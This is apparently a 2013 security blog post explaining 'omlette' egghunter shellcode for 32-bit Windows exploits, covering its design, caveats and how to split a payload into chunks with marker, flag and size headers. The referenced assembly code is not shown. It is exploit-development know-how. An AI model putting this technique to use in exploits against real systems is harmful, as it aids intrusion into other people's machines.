Thursday, October 31, 2013

Introduction

When I first heard about omlette egghunter shellcode I was pretty keen to give it a try, but did not have the opportunity until after I heard that under some unknown circumstances it "doesn't work" (see the note here). At that point I thought Id have a try at writing some omlette egghunter shellcode myself. Then about three years passed until I finally got around to doing it.

Omlette Shellcode

What is it? Omlette shellcode is essentially a variation on egghunter shellcode. As previously discussed on this blog, egghunter shellcode is a small piece of shellcode, suitable for inserting into space restricted program buffers. Its job is to find, and pass control to, larger sections of shellcode (or "eggs") located in program memory. Traditional egghunter implementations will usually expect that the "egg" will be inserted into memory in one piece. Omlette shellcode allows you to insert your egg into memory in multiple pieces, and handles the tasks of finding those pieces, sticking them together, and finally passing control to the reconstructed egg. You would use it in exploits where you don't have enough space to include your entire final payload into memory using a single buffer.

Its a bit of a niche thing, and I don't imagine it will be required in too many exploits, but I was interested in having a go at writing an implementation myself.

My Implementation

My implementation uses the syscall method for safely searching Windows memory as documented by Matt Miller, and is based on a modification of his egghunter code from here.

I essentially took his memory searching code, modified parts of it to replace stack operations with direct register operations, and added some extra bits at the start and the end to enable the egg to be reconstructed on the stack and then run.

Caveats

Like Matt Millers original egghunter, it assumes that the direction flag is unset. This will be the case most of the time, but if not you can add a "CLD - \xfc" instruction to the start to clear it.

The final "egg" is assembled on the stack starting at the ESP register. Make sure you don't have anything you need at that location in memory, because it will be overwritten. Be careful of where the egghunter code itself is located (so you don't overwrite it mid operation) and pivot first if you need to.

The egg chunks need to be located in memory IN ORDER. The egghunter searches memory in ascending order, and it will append the chunks together in the order it finds them until it reaches the final chunk, whereupon it passes control to the reconstructed shellcode. This might limit the exploits you can use it in - memory ordering may not always be something you can control.

I have only tested this on Windows XP SP3. Presumably it will work on other 32 bit Windows versions too, let me know if not and I'll see if I can fix it. It is very unlikely to work for 32 bit apps on 64 bit Windows systems.

Usage

The use of this egghunter is similar to that of Matt Millers original, (click here if you need a reminder of how this works), except instead of inserting the payload using one buffer, you break it up into multiple chunks first. Each chunk can be of any size up to 255 bytes, and there is no need to maintain consistency in chunk sizes (the chunks can all be different sizes if you want). Before getting the chunks into memory you have to add a 10 byte header to each chunk which consists of a twice repeating 4 byte "marker" value that helps the egghunter find the egg, followed by a one byte "final chunk" flag value and a one byte size value. The "final chunk" flag value is set to a "\x01" for the final egg chunk (chunk n), and to any other value for chunks 1 through n-1.

Lets consider an example. Assume you have to write an exploit where the initial buffer you can access after gaining control of processor execution is just big enough for this omlette shellcode. However, you can also control the contents of four other memory buffers with about 110 bytes of usable space in each.

First compile the assembly code with nasm and dump the compiled output in hex format to paste into your exploit. You can edit the marker value in the code first if you want to change it. The default value in the assembly above is 0x78563412 which will mean you need to send \x12\x34\x56\x78 as the marker in your exploit (remember: bytes in little endian order). Save the assembly as omlette.asm and do the following:

To use this, you would first add some NOP padding (shikata_ga_nai tends to error out if you don't pad between the start of the code and the stack pointer), and then break it up into four chunks of 96 bytes each, like shown below. Note that the egghunter shellcode doesn't require that the chunks be the same size, that's just the easiest way to do it in this case.

Then prepend a header to each chunk comprised of the marker ("\x12\x34\x56\x78") repeated twice, a single byte flag value ("\x01" for the final chunk, and anything else, I have used "\x02", for the other chunks) and a single byte size value ("\x60" as the hex representation of 96).

Now you would insert these various sets of bad data into your exploit in the appropriate places, and when the egghunter shellcode is executed, it should be able to find the chunks of the final payload in memory, piece them together on the stack, and then pass control to it when all parts are found.